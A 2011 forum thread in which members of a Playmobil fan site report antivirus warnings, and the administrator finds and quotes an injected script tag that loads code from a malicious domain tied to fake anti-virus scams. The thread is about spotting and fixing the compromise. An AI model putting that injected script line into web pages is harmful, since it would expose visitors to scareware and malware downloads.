PlaymoFriends
Getting Started => Technical Support/Testing => Topic started by: tonguello on March 28, 2011, 15:04:59
-
Well, the title says it all.
I don't know since when because I've been gone for a couple of days, but today when I got home and then the office, a pop up virus warning appears when Im trying to get into www.playmofriends.com
The virus is this one HTML / Scrinject.B.Gen
It doesn't happen if I go directly to the boards page, so I can logg in like that.
Anybody is having that problem? Both antivirus that I have are very powerfull so it might be just me so far... :)
Anyway... I can logg in going directly to the forum boards.
-
Nope, Nothing like that for me. I only noticed yesterday, and its still the case today, of a \n on the top left corner of the home page...
-
Hm, I see the /n, too. But no virus warning for me. Strange...
-
I already have been hit with a virus months ago. The virus I got disabled my subscription virus protection & then inserted it. Very cunning effort.
-
The /n could be a server glitch (the page got messed up somehow when loading to the server), but the 1st thing I would think is that it was hacked or somebody tried to hack it, and some of the code was changed.
-
... the 1st thing I would think is that it was hacked or somebody tried to hack it, and some of the code was changed.
I think you're right. The page has been hacked. :hmm:
I just viewed the source code for the current home page and there is a script hidden in the code which I did not put there! :no:
<script src="<script src="http://welcometotheglobalisorg.com/nl.php?p=1"></script>\n<html>
I will upload a fresh version of the page in a few minutes.
Hopefully this will not be an ongoing problem where I have to keep overwriting the page. :crossed:
-
Sylvia, bring this to the attention of your ISP ASAP! It's their responsibility to keep your code safe.
-
wow! we've been hacked!?? suspicious! :hmm:
-
this is serious... who wants to hack a playmobil forum? :hmm:
-
Yeah... I don't like the sound of that!
-
this is serious... who wants to hack a playmobil forum? :hmm:
A playmoterrorist, without a doubt.
-
:0
imagine the harm that hacker could have done? :'(
-
I think people just hack anything they can :no:
Sylvia, you should put some pics of Elric's zombie knights, or Rasputin's clown army on the home page to try and scare any potential naughty persons away! :D
Damo :)
-
Or Ras's diamond-eyed skulls! That would be enough to scare anyone away! :0 :omg: :0
-
A playmoterrorist, without a doubt.
The FBI just released a mug shot of one of them here (http://playmodb.org/cgi-bin/showpart.pl?partnum=30-00-7952).
-
:lol: :lol: :lol:
-
this is serious... who wants to hack a playmobil forum? :hmm:
According to THIS SITE (http://blog.sucuri.net/2011/02/hilary-kneber-godaddy-and-welcometotheglobalisnet-com.html), “welcometotheglobalisorg-dot-commercial sites” is a fake anti-virus uploader. It will attempt to re-direct you to another infected site, where it will tell you that you have a virus and start running a “scan” of your computer. They will then tell you that “for only $78.ØØ yearly” they can clean your computer of all that ails it.
I had a link to a fake anti-virus killer site… If I can find it again I’ll post the URL. (It is a legit site, I’ve used it a few times.)
-
BB, isn't that what you got? A fake virus-scanner virus? My mom got one of those recently, with the pop up telling you've got a virus, but really it is the virus, and it destroyed her computer.
-
BB, isn't that what you got? A fake virus-scanner virus? My mom got one of those recently, with the pop up telling you've got a virus, but really it is the virus, and it destroyed her computer.
Yup! That's what it did! It even disabled my paid virus protection during the scan I didn't want it to perform.
-
So where does this stand, Sylvia? Is it fixed as far as you can tell?
-
the virus warning poping up here, is not there anymore. I guess that's a good thing. :-\
-
Wasn't Playmobored hacked and this is when Panos gave up the site?
What are the risks of being on here if the site has been compromised?
-
Just your registration info can be at the mercy of the palymoterrorists.
-
I've sent a message to the support team at Dreamhost to tell them what happened, and I will be changing my FTP password (only known to me AFAIK) just in case that is how the hackers got in.
-
i too had the same problem as Gastón - i was away from the forum for 2 days b/c of that >:( :o
(i mostly log in at work, where i am almost all day and that's where i got the pop up ad - didn't experience this issue on my phone)
thank you for working on it :cloud9:
-
I agree with you as a virus pop up would show when I was logging in into www.playmofriends.com but not when logging into www.playmofriends.com/forum :hmm:
I am delighted it is now sorted as I was equally worried about it ;)
Karim :)
-
I've been advised to upgrade everything - the Coppermine Photo Album is a very old version and there are of course more recent versions of the forum program we're using too. Call me cynical, but I think this is primarily an easy way for the webhost to put the blame squarely at my door and completely absolve themselves of any fault. :hmm:
The trouble is it's not a simple process because some of the important features on the forum such as the questions on the registration form were added by modifying the original scripts. To get everything working exactly the same with an upgraded version of SMF could take me several days. I'm keen to get it done (as it's long overdue) but I can't spare the time to do it right now. Maybe in the summer there will be an opportunity to do so. :crossed:
-
Thank you for your update and all your hard work to keep this forum up and running Sylvia!
-
Yes sylvia, thank you so much for all you do! I'm sorry this is going to make more work for you. :(
-
I agree with you as a virus pop up would show when I was logging in into www.playmofriends.com but not when logging into www.playmofriends.com/forum :hmm:
I am delighted it is now sorted as I was equally worried about it ;)
Karim :)
About a week or so ago, a similar thing happend to me, but not here but when I (tried to) visit "Klickywelt". The "dot com" caused trouble, the "dot com / forum" worked fine. ???
-
mm that's suspicious! :hmm:
-
Just stumbled upon this webpage on the BBC news site.
Looks like it was a very widespread problem. >:(
Sites hit in massive web attack (http://www.bbc.co.uk/news/technology-12933053)
-
This is really frustrating...
I just dont see what their gain would be...
Redirect you to get theri software and then what? Just mess around and cause chaos?
-
basically is to create caos and then get paid to fix it. smart....but sooooooo wrong!
-
It's just like anyone who starts these viruses, they're just sick!
-
Sylvia, is there anything anybody other then yourself can do to help you upgrade the software?
-
I don't think so, Gis. :-\
I kept notes of what I added and edited last time so that will hopefully help when I need to do it again. The trouble is the PHP pages will probably look a lot different to the existing ones, and it can take time to work out where in the script things need to go.
I may need help when it comes to bridging a new version of Coppermine to the forum - I remember it was quite a pain in the butt last time. 8}
-
I wish we could help so you don't have to do it all alone! If there is anything we can do to help, let us know!